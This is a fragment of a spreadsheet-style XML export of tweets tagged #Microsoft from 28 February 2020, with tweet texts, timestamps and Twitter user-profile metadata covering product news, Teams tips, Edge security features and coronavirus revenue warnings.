    <t>{'id': 3610792533, 'id_str': '3610792533', 'name': 'Cyber &amp; Tech News and Advice', 'screen_name': 'CyberTechToday', 'location': '', 'description': 'Cyber and IT Security Tech News from Experts #cyber  #cybersecurity #technews #cyberstudy #cybercrime', 'url': 'https://t.co/HzpPR2VfCi', 'entities': {'url': {'urls': [{'url': 'https://t.co/HzpPR2VfCi', 'expanded_url': 'https://www.cyberandtech.com', 'display_url': 'cyberandtech.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4900, 'friends_count': 1521, 'listed_count': 18, 'created_at': 'Thu Sep 10 15:40:52 +0000 2015', 'favourites_count': 1071, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 9953,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'http://pbs.twimg.com/profile_images/1087072309557506050/P6Pa8NLF_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1087072309557506050/P6Pa8NLF_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3610792533/1548013172',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</si>
  <si>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17:01:25 +0000 2020</t>
  </si>
  <si>
    <t>SMBs are hungry for #tech that brings customer data together and helps drive #DigitalTransformation. More, via @smbgroup    #Microsoft #Technology #BusinessAutomation #accounting #MSDyn365 https://t.co/Z5Y5laCMiD</t>
  </si>
  <si>
    <t>{'id': 1015288507789709320, 'id_str': '1015288507789709320', 'name': 'PNC IT', 'screen_name': 'PNC_IT', 'location': 'Soldotna, AK, US, 99669', 'description': 'Locally owned and operated, PNC IT is here to improve your business. We consult with you on every aspect of your business and provide solutions tailored to you.', 'url': 'https://t.co/zLxByzMBbl', 'entities': {'url': {'urls': [{'url': 'https://t.co/zLxByzMBbl', 'expanded_url': 'https://pncit.com/', 'display_url': 'pncit.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4, 'friends_count': 3, 'listed_count': 0, 'created_at': 'Fri Jul 06 17:36:58 +0000 2018', 'favourites_count': 6, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 347,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'http://pbs.twimg.com/profile_images/1234806379052924930/jbwaT6Ma_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234806379052924930/jbwaT6Ma_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1015288507789709320/1530899747', 'profile_link_color': '47AA42',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</si>
  <si>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17:00:38 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft this week announced a forthcoming feature in its #Chromium-based Edge browser that will block potentially unwanted applications (PUAs) from getting installed. https://t.co/xvGHgmOMBl #security</t>
  </si>
  <si>
    <t>Fri Feb 28 17:00:29 +0000 2020</t>
  </si>
  <si>
    <t>Getting started using the FaunaDB VS @Code extension is simple - just add it from the Marketplace. https://t.co/zHUOimCANc
#Microsoft #VSCode #VisualStudioCode #Serverless #Javascript  #FaunaDB</t>
  </si>
  <si>
    <t>Fri Feb 28 17:00:25 +0000 2020</t>
  </si>
  <si>
    <t>Heard all the buzz about #digitaltransformation but not sure how relevant it is to your organization or department? In this blog, we cover how digital transformation can benefit two key departments in an organization: https://t.co/EHSyxXC772 #cloud #rpa #azure #microsoft</t>
  </si>
  <si>
    <t>Fri Feb 28 17:00:12 +0000 2020</t>
  </si>
  <si>
    <t>My personal website. Senior Software Engineer. Specialized in #Microsoft Technologies including #dotnet #dotnetcore &amp;amp; #Azure 
https://t.co/bXH8SPnIBs https://t.co/HP8f1XyZC6</t>
  </si>
  <si>
    <t>Fri Feb 28 16:59:08 +0000 2020</t>
  </si>
  <si>
    <t>*Shares of #Microsoft, the most valuable company of US, fell 7 % after the software giant said on Wednesday that its sales in the current quarter would be lower because of the outbreak. *Anheuser-Busch InBev, the maker of Budweisers shares fell by 9 %.</t>
  </si>
  <si>
    <t>{'id': 349521174, 'id_str': '349521174', 'name': 'Dr Gulrez Sheikh', 'screen_name': 'drsheikhRSS', 'location': 'India', 'description': "SPOKESPERSON @bjp4MP, Humanist, Political thinker, Rationalist, Educationalist, Authored Deendayal ji's Biography, Dentist, #à¤¸à¥à¤µà¤¯à¤‚à¤¸à¥‡à¤µà¤•,Derogatory language=BLOCK", 'url': 'https://t.co/QdBPgwB9r1', 'entities': {'url': {'urls': [{'url': 'https://t.co/QdBPgwB9r1', 'expanded_url': 'https://www.amazon.in/dp/8192959864/ref=cm_sw_r_cp_api_i_5aS7CbRSE9R1M', 'display_url': 'amazon.in/dp/8192959864/â€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 10689, 'friends_count': 373, 'listed_count': 28, 'created_at': 'Sat Aug 06 06:55:25 +0000 2011', 'favourites_count': 9766, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 33426,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'http://pbs.twimg.com/profile_images/1183793754924294146/zzMn81nw_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1183793754924294146/zzMn81nw_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/349521174/1568057700',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</si>
  <si>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 Tip of the Day ***
Happy MS Teams Friday!
Ready for another useful MS Teams tip?
Here's how to get the list of all the teams in your organization by connecting your Teams PowerShell module in PowerShell with admin privileges: https://t.co/gLHyd0qb4x
#MSTeams #Microsoft https://t.co/WXcgCLTfqd</t>
  </si>
  <si>
    <t>Fri Feb 28 16:59:07 +0000 2020</t>
  </si>
  <si>
    <t>Standardize mobile UI with #Microsoft Launcher for Android https://t.co/HhRmuaGuR7 via @Hybrid_Circle #Azure #AWS</t>
  </si>
  <si>
    <t>Fri Feb 28 16:55:50 +0000 2020</t>
  </si>
  <si>
    <t>Visual Studio Online Boosts Customization: #Microsoft has provided more customization functionality and other enhancements to Visual Studio Online ... https://t.co/8HdUJ6gCnm</t>
  </si>
  <si>
    <t>Fri Feb 28 16:55:21 +0000 2020</t>
  </si>
  <si>
    <t>"By tracking asset location, you will be able to better maintain inventory, know which assets are always available and where they can be distributed." #microsoft #SCCM #IT #discoverytool #inventory #reconcile #AssetManagement #informationtechnology 
 https://t.co/6WD0MUgAMQ</t>
  </si>
  <si>
    <t>{'id': 920002241150451712, 'id_str': '920002241150451712', 'name': 'VIZOR', 'screen_name': 'VizorCloud', 'location': 'Atlanta, GA', 'description': 'IT Asset Management sln that 1) centralizes info, 2) streamlines workflows, 3) saves money &amp; 4)reduces workload. BEST PART: We manage Software licenses &amp; SaaS', 'url': 'https://t.co/09jBFI5EPI', 'entities': {'url': {'urls': [{'url': 'https://t.co/09jBFI5EPI', 'expanded_url': 'https://www.vizor.cloud/', 'display_url': 'vizor.cloud', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 201, 'friends_count': 472, 'listed_count': 8, 'created_at': 'Mon Oct 16 19:03:21 +0000 2017', 'favourites_count': 185, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1145,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'http://pbs.twimg.com/profile_images/955899457593397248/EFhku75m_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/955899457593397248/EFhku75m_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/920002241150451712/1578428371', 'profile_link_color': 'FBB03B',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</si>
  <si>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16:55:09 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft tries not to fall behind on the new #Privacy trend by introducing a feature that blocks "Potentially Unwanted Applications" to #Edge browser.
https://t.co/hOWqyBC6g7</t>
  </si>
  <si>
    <t>{'id': 798081781312327680, 'id_str': '798081781312327680', 'name': 'SafeSwiss', 'screen_name': 'SafeSwiss', 'location': 'Switzerland', 'description': 'Swiss-made private and secure anonymous messenger that aims to bring e2e encryption to masses', 'url': 'https://t.co/e2mypdxD7c', 'entities': {'url': {'urls': [{'url': 'https://t.co/e2mypdxD7c', 'expanded_url': 'http://www.safeswiss.com', 'display_url': 'safeswiss.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4450, 'friends_count': 1188, 'listed_count': 34, 'created_at': 'Mon Nov 14 08:34:59 +0000 2016', 'favourites_count': 1255, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2574,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'http://pbs.twimg.com/profile_images/894676287981199360/b-8zKLqD_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/894676287981199360/b-8zKLqD_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/798081781312327680/1575280112', 'profile_link_color': 'C9240E',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</si>
  <si>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16:54:01 +0000 2020</t>
  </si>
  <si>
    <t>Filled Map with conditional format is not working in Power BI Service. Are you experiencing same? The map does render correctly in desktop. Submitted a ticket. Unresolved for several days now. #Microsoft #PowerBI #FAIL https://t.co/eL2EGzLRIR</t>
  </si>
  <si>
    <t>Fri Feb 28 16:53:08 +0000 2020</t>
  </si>
  <si>
    <t>Check out these limited stock Ocean Shadow controllers for 69.99! They look so slick...
https://t.co/Jtyr8QsP7Z
#g2gstock #limitedstock #hotukdeals #whilststockslast #fairplay #gaming #oceanshadow #microsoft #xboxcontroller #sweetdeals #UKDeals #trending #hotproduct #g2g https://t.co/aJUazLIyHK</t>
  </si>
  <si>
    <t>{'id': 380794635, 'id_str': '380794635', 'name': 'Go2Games', 'screen_name': 'GO2GAMES', 'location': 'Croydon, London', 'description': 'We sell video games! Official Twitter of https://t.co/XMzVdULfmh and home to the Go2Gamers.\n#GET2GAMING', 'url': 'http://t.co/7446u4NBgl', 'entities': {'url': {'urls': [{'url': 'http://t.co/7446u4NBgl', 'expanded_url': 'http://www.go2games.com', 'display_url': 'go2games.com', 'indices': [0, 22]}]}, 'description': {'urls': [{'url': 'https://t.co/XMzVdULfmh', 'expanded_url': 'http://www.Go2Games.com', 'display_url': 'Go2Games.com', 'indices': [41, 64]}]}}, 'protected': False, 'followers_count': 1638, 'friends_count': 317, 'listed_count': 34, 'created_at': 'Tue Sep 27 07:32:09 +0000 2011', 'favourites_count': 793, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 4659, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'CDCCCC', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/724526935028715520/0ub9qmkn_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/724526935028715520/0ub9qmkn_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/380794635/1560517064', 'profile_link_color': '0094AE', 'profile_sidebar_border_color': 'A9AA9B', 'profile_sidebar_fill_color': 'E8E8E8', 'profile_text_color': '353B34', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Fri Feb 28 16:51:35 +0000 2020</t>
  </si>
  <si>
    <t>Ive got basic auth on the brain! #solong #Microsoft #basicauth</t>
  </si>
  <si>
    <t>{'id': 4860655080, 'id_str': '4860655080', 'name': 'Tiffany LaQuerre', 'screen_name': 'ehloitstlaq', 'location': '', 'description': 'â€œYou had me at EHLO!â€ -Tom Cruise |O365 aficionado | Podcast Host @HTHTHEPODCAST', 'url': 'https://t.co/o8dM4K3imS', 'entities': {'url': {'urls': [{'url': 'https://t.co/o8dM4K3imS', 'expanded_url': 'https://podcasts.apple.com/us/podcast/hope-this-helps/id1492373157', 'display_url': 'podcasts.apple.com/us/podcast/hopâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 159, 'friends_count': 795, 'listed_count': 7, 'created_at': 'Thu Feb 04 21:09:14 +0000 2016', 'favourites_count': 1254, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 497,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'http://pbs.twimg.com/profile_images/1231798673845227520/sSHMYra5_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1231798673845227520/sSHMYra5_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/4860655080/1582518665',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</si>
  <si>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16:50:09 +0000 2020</t>
  </si>
  <si>
    <t>@Walgreens uses #Microsoft #HoloLens2 for #MixedReality training  https://t.co/250XY3Hs9G #emergingtech #retail</t>
  </si>
  <si>
    <t>{'id': 291831562, 'id_str': '291831562', 'name': 'Paula Piccard ðŸ‡µðŸ‡· ðŸ‡ºðŸ‡¸', 'screen_name': 'Paula_Piccard', 'location': 'New York, USA', 'description': '#NewYork-er #WomeninTech #Cybersecurity Advocate â˜† #DigitalTransformation â˜† Social Media #Marketing â˜† #DigitalMarketing â˜†', 'url': 'https://t.co/LxiX2dqJGR', 'entities': {'url': {'urls': [{'url': 'https://t.co/LxiX2dqJGR', 'expanded_url': 'https://campsite.bio/paulapiccard', 'display_url': 'campsite.bio/paulapiccard', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 50900, 'friends_count': 9989, 'listed_count': 1378, 'created_at': 'Mon May 02 17:47:28 +0000 2011', 'favourites_count': 93022, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 95608, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'ADB0DE', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme18/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme18/bg.gif', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1007344781050048512/tThzjCI__normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1007344781050048512/tThzjCI__normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/291831562/1582050465', 'profile_link_color': '1D43DE',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</si>
  <si>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Feb 28 16:48:59 +0000 2020</t>
  </si>
  <si>
    <t>Watch our video to discover our top 5 tips and tricks for #Office365. Head over to our blog for more information to help you master #Microsoft Office 365. #tech #it #publicsector 
https://t.co/nTqG7TWofx
https://t.co/14CTq4cuuQ</t>
  </si>
  <si>
    <t>Fri Feb 28 16:47:53 +0000 2020</t>
  </si>
  <si>
    <t>Read Receipts in Microsoft Teams https://t.co/RdXow77nNg #OneMinuteOfficeMagic #Office365 #Microsoft #MicrosoftTeams #ReadReceipts</t>
  </si>
  <si>
    <t>Fri Feb 28 16:46:09 +0000 2020</t>
  </si>
  <si>
    <t>It's #Friyay, what are you up to this weekend!? If it's job searching, lets make this process easier for you... WE ARE HIRING! Check out our job openings on our Linkedin page. https://t.co/6rQmq32wC7 #D365Careers #Microsoft #MicrosoftCareers #WorkLifeBalance #UnlimitedPTO #Hiring https://t.co/IuFvVPwvIc</t>
  </si>
  <si>
    <t>{'id': 1004943727, 'id_str': '1004943727', 'name': 'JOBSatAKA', 'screen_name': 'JOBSatAKA', 'location': 'New York, NY 10001', 'description': '2019 MSFT Inner Circle member &amp; Dynamics Financial Services Partner of the Year Finalist. Gold Certified MFST Partner for ERP, CRM &amp; Cloud.', 'url': 'https://t.co/VlSvwobfWA', 'entities': {'url': {'urls': [{'url': 'https://t.co/VlSvwobfWA', 'expanded_url': 'http://www.akaes.com/careers', 'display_url': 'akaes.com/careers', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 159, 'friends_count': 75, 'listed_count': 37, 'created_at': 'Tue Dec 11 21:34:18 +0000 2012', 'favourites_count': 41, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3045,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'http://pbs.twimg.com/profile_images/1174403862226227202/4JgZb5zJ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1174403862226227202/4JgZb5zJ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1004943727/1504795856', 'profile_link_color': '19CF86',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</si>
  <si>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16:42:31 +0000 2020</t>
  </si>
  <si>
    <t>#Jcat: A New Alternative To #Microsoft Catalog Files
https://t.co/wdpzvmTOvQ</t>
  </si>
  <si>
    <t>{'id': 18553889, 'id_str': '18553889', 'name': 'Phoronix', 'screen_name': 'phoronix', 'location': 'Phoronix-Media.com', 'description': 'Founded by @MichaelLarabel in 2004, Phoronix is the largest #opensource news &amp; #Linux hardware reviews site + Phoronix Test Suite + @OpenBenchmark + @Phoromatic', 'url': 'https://t.co/rBK62vrus7', 'entities': {'url': {'urls': [{'url': 'https://t.co/rBK62vrus7', 'expanded_url': 'http://www.phoronix.com/', 'display_url': 'phoronix.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 21316, 'friends_count': 121, 'listed_count': 1084, 'created_at': 'Fri Jan 02 15:17:17 +0000 2009', 'favourites_count': 1234, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 35149, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'EFEFEF', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/937312281662279682/bqi_9AN2_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/937312281662279682/bqi_9AN2_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/18553889/1547292803', 'profile_link_color': '2E6780',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</si>
  <si>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Fri Feb 28 16:42:27 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Office para Smartphones
https://t.co/wfuJPy5Vn0
#Apps #Microsoft #office #Smartphones https://t.co/71h2HgdXnE</t>
  </si>
  <si>
    <t>{'id': 413249236, 'id_str': '413249236', 'name': 'Universo da Web', 'screen_name': 'universodaweb', 'location': 'Curitiba/PR', 'description': 'Curiosidades, Dicas e Novidades do Mundo da Tecnologia universodawebctba@gmail.com\nhttps://t.co/4M5U40dCIo\nhttps://t.co/ICa93ytfYc', 'url': 'https://t.co/iJrYx6okqc', 'entities': {'url': {'urls': [{'url': 'https://t.co/iJrYx6okqc', 'expanded_url': 'http://www.universodaweb.net', 'display_url': 'universodaweb.net', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/4M5U40dCIo', 'expanded_url': 'http://www.intagram.com/grupo.universo', 'display_url': 'intagram.com/grupo.universo', 'indices': [83, 106]}, {'url': 'https://t.co/ICa93ytfYc', 'expanded_url': 'http://www.facebook.com/Universo-da-Web-66443869', 'display_url': 'facebook.com/Universo-da-Weâ€¦', 'indices': [107, 130]}]}}, 'protected': False, 'followers_count': 3893, 'friends_count': 2572, 'listed_count': 3, 'created_at': 'Tue Nov 15 17:14:58 +0000 2011', 'favourites_count': 49, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 502,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'http://pbs.twimg.com/profile_images/1156627452841680896/k2yBcfnR_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1156627452841680896/k2yBcfnR_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/413249236/1499386065',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</si>
  <si>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16:42:05 +0000 2020</t>
  </si>
  <si>
    <t>Fri Feb 28 16:40:06 +0000 2020</t>
  </si>
  <si>
    <t>Windows 10 trick unlocks secret surfing game hidden inside your web browser
https://t.co/5IWJsnfGhF #Tech #Microsoft #Windows10 #WebBrowser</t>
  </si>
  <si>
    <t>{'id': 213230769, 'id_str': '213230769', 'name': 'Estates ITÂ®', 'screen_name': 'EstatesIT', 'location': 'London', 'description': 'PCHomes #EstateAgent &amp; #LettingAgent #Software Desktop &amp; #Cloud, CRM, Sales, Lettings, Property Management &amp; Client Accounts, #EstateAgencyWebsites &amp; #Office365', 'url': 'https://t.co/hlhuNedR4M', 'entities': {'url': {'urls': [{'url': 'https://t.co/hlhuNedR4M', 'expanded_url': 'https://www.estatesit.com', 'display_url': 'estatesit.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2989, 'friends_count': 1295, 'listed_count': 321, 'created_at': 'Mon Nov 08 10:36:26 +0000 2010', 'favourites_count': 318, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 30790,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'http://pbs.twimg.com/profile_images/473456017892577280/nyhYKDuo_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/473456017892577280/nyhYKDuo_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/213230769/1430222291',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</si>
  <si>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Feb 28 16:40:00 +0000 2020</t>
  </si>
  <si>
    <t>#Google says #Microsoft #Edge isn't secure. I asked Google why https://t.co/Y8ljJKbWlq via @ZDNet &amp;amp; @ChrisMatyszczyk</t>
  </si>
  <si>
    <t>Fri Feb 28 16:39:10 +0000 2020</t>
  </si>
  <si>
    <t>Whats New in Microsoft Teams | February 2020 https://t.co/5qjiL7L8vC #Microsoft</t>
  </si>
  <si>
    <t>Fri Feb 28 16:36:22 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft lowered its revenue estimates for the current quarter, saying it will feel the impact of the #coronavirus epidemic with lower sales of #Windows and Surface devices. It became the latest global firm to warn of a financial hit from the global outbreak of #COVID19 https://t.co/weKn1XCFSQ</t>
  </si>
  <si>
    <t>{'id': 1211950858746785793, 'id_str': '1211950858746785793', 'name': 'Economic Daily, China', 'screen_name': 'EDNewsChina', 'location': 'åŒ—äº¬, ä¸­åŽäººæ°‘å…±å’Œå›½', 'description': 'Top Economic News on Policy, Finance, Corporates and Market in China.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 5618, 'friends_count': 87, 'listed_count': 8, 'created_at': 'Tue Dec 31 10:03:22 +0000 2019', 'favourites_count': 2098, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2090, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1211953773628624897/iqu1OXRW_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1211953773628624897/iqu1OXRW_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1211950858746785793/1577787273',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</si>
  <si>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16:36:20 +0000 2020</t>
  </si>
  <si>
    <t>SharePoint 2019 vs 2016 vs SharePoint Online
See: https://t.co/xEPy3KKDcO
#SharePoint #SharePoint2019 #SharePoint2016 #SharePointOnline #Microsoft #MicrosoftSharePoint #Apps4Rent https://t.co/J2U3F0mAsB</t>
  </si>
  <si>
    <t>Fri Feb 28 16:35:22 +0000 2020</t>
  </si>
  <si>
    <t>Dammit #Microsoft. Change the fucking #Xbox format back. Not all Gamers are young people with good eyes.</t>
  </si>
  <si>
    <t>{'id': 2610211183, 'id_str': '2610211183', 'name': 'Svetlana Rodriguez', 'screen_name': 'SuzieR43', 'location': 'MIchigan', 'description': 'Love  the New England  Patriots, All things Russian, learning languages, all sports, Michigan Wolverines, writing, German Shepherds, &amp; Video Games.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 488, 'friends_count': 521, 'listed_count': 10, 'created_at': 'Mon Jul 07 17:52:35 +0000 2014', 'favourites_count': 8668, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 4166, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': True, 'profile_background_color': '000000', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/912888471710134272/1JJNLv7T_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/912888471710134272/1JJNLv7T_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2610211183/1506484753',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</si>
  <si>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16:27:36 +0000 2020</t>
  </si>
  <si>
    <t>The world of #Microsoft #Dynamics is changing, rapidly, and its an exciting time to be part of the community. Change is Good. The team at Turnkey Business Software is also embracing change  with a major office refit and ambitious growth plans https://t.co/CRWtXJUs27</t>
  </si>
  <si>
    <t>{'id': 587416050, 'id_str': '587416050', 'name': 'Turnkey Business SW', 'screen_name': 'Turnkey_BS', 'location': '', 'description': "Microsoft Dynamics Business Central 365 is what we know. We don't sell it out of a box, we make sure it fits our clients needs. Cerebral challenges welcomed.", 'url': 'http://t.co/F2ACcPJf', 'entities': {'url': {'urls': [{'url': 'http://t.co/F2ACcPJf', 'expanded_url': 'http://www.turnkey-bs.com/', 'display_url': 'turnkey-bs.com', 'indices': [0, 20]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 285, 'friends_count': 717, 'listed_count': 53, 'created_at': 'Tue May 22 11:01:35 +0000 2012', 'favourites_count': 237, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1585, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '3573B9', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1222091331750809600/a0qD8Tfp_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1222091331750809600/a0qD8Tfp_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/587416050/1580204054', 'profile_link_color': '3573B9',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</si>
  <si>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16:27:00 +0000 2020</t>
  </si>
  <si>
    <t>CollabNews just released https://t.co/9jMr515TJ0 many thanks @MSITProNews #microsoft #ufo365articles</t>
  </si>
  <si>
    <t>Fri Feb 28 16:24:03 +0000 2020</t>
  </si>
  <si>
    <t>It can happen to anyone. Stay vigilant. 
#askdigitalplains #phishing #Security #teams #msteams #o365 #m365 #microsoft #microsoftteams #azure #aws #snowflake 
https://t.co/Mrib45nmbZ</t>
  </si>
  <si>
    <t>Fri Feb 28 16:23:42 +0000 2020</t>
  </si>
  <si>
    <t>So with #Microsoft changing their certification paths, I'm not going to bother with the MCSE 2016 or 2019. I don't want to be a 365 or Teams admin, I would have thought that there might have been something #PowerShell related, not just straight #Azure</t>
  </si>
  <si>
    <t>{'id': 317599179, 'id_str': '317599179', 'name': 'Steve Malcolm', 'screen_name': 'Spongeym', 'location': 'Chalfont Saint Peter, South Ea', 'description': 'IT #contractor, #infrastructure #euc, #devops #cloud. I love my football #LFC &amp; #wfc, feel free to follow!', 'url': 'https://t.co/BeeOiZHZuG', 'entities': {'url': {'urls': [{'url': 'https://t.co/BeeOiZHZuG', 'expanded_url': 'https://www.linkedin.com/in/steve-malcolm-78aa65a?lipi=urn%3Ali%3Apage%3Ad_flagship3_profile_view_ba', 'display_url': 'linkedin.com/in/steve-malcoâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 588, 'friends_count': 1220, 'listed_count': 14, 'created_at': 'Wed Jun 15 05:17:43 +0000 2011', 'favourites_count': 8310, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2204,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'http://pbs.twimg.com/profile_images/378800000270873785/8bb34de6e023fe094d3d5e38eba5bcf5_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/378800000270873785/8bb34de6e023fe094d3d5e38eba5bcf5_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/317599179/1504248430',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</si>
  <si>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Feb 28 16:23:01 +0000 2020</t>
  </si>
  <si>
    <t>Remove Background From Image | Photo Background Cutter | Remove Object From Photo | Ms Word | Edit
Video link - https://t.co/KhcMV3oMRM
subscribe - https://t.co/l9Q5DMHQ9k
#photo #picture #photoediting #image #photoshop #msword #microsoft #abhishekanand4u #learnandearn #tips https://t.co/x1lsCuezxT</t>
  </si>
  <si>
    <t>{'id': 495269454, 'id_str': '495269454', 'name': 'Abhishek Anand', 'screen_name': 'AbhishekAnand4u', 'location': 'Patna , Bihar', 'description': 'Hi Dear friends, I m Abhishek Anand.If you are interested in part time homebased work then contact me  email : vic2dataentry@gmail.com', 'url': 'http://t.co/EqYUJpU4t2', 'entities': {'url': {'urls': [{'url': 'http://t.co/EqYUJpU4t2', 'expanded_url': 'http://www.vic2earn.blogspot.com', 'display_url': 'vic2earn.blogspot.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1299, 'friends_count': 1470, 'listed_count': 5, 'created_at': 'Fri Feb 17 19:48:38 +0000 2012', 'favourites_count': 12, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 36824,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'http://pbs.twimg.com/profile_images/1100288404393123841/JpaZjxWz_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1100288404393123841/JpaZjxWz_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/495269454/1552309872',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</si>
  <si>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Feb 28 16:20:40 +0000 2020</t>
  </si>
  <si>
    <t>#Indonesia promises #Microsoft an #RSS #DataCentre - Regulation Super Simple - approach for their investment interest in the country. #PublicPolicy #Technology #DC #CloudComputing #ASEAN #AsiaPacific  
https://t.co/9gvR5hEsQi</t>
  </si>
  <si>
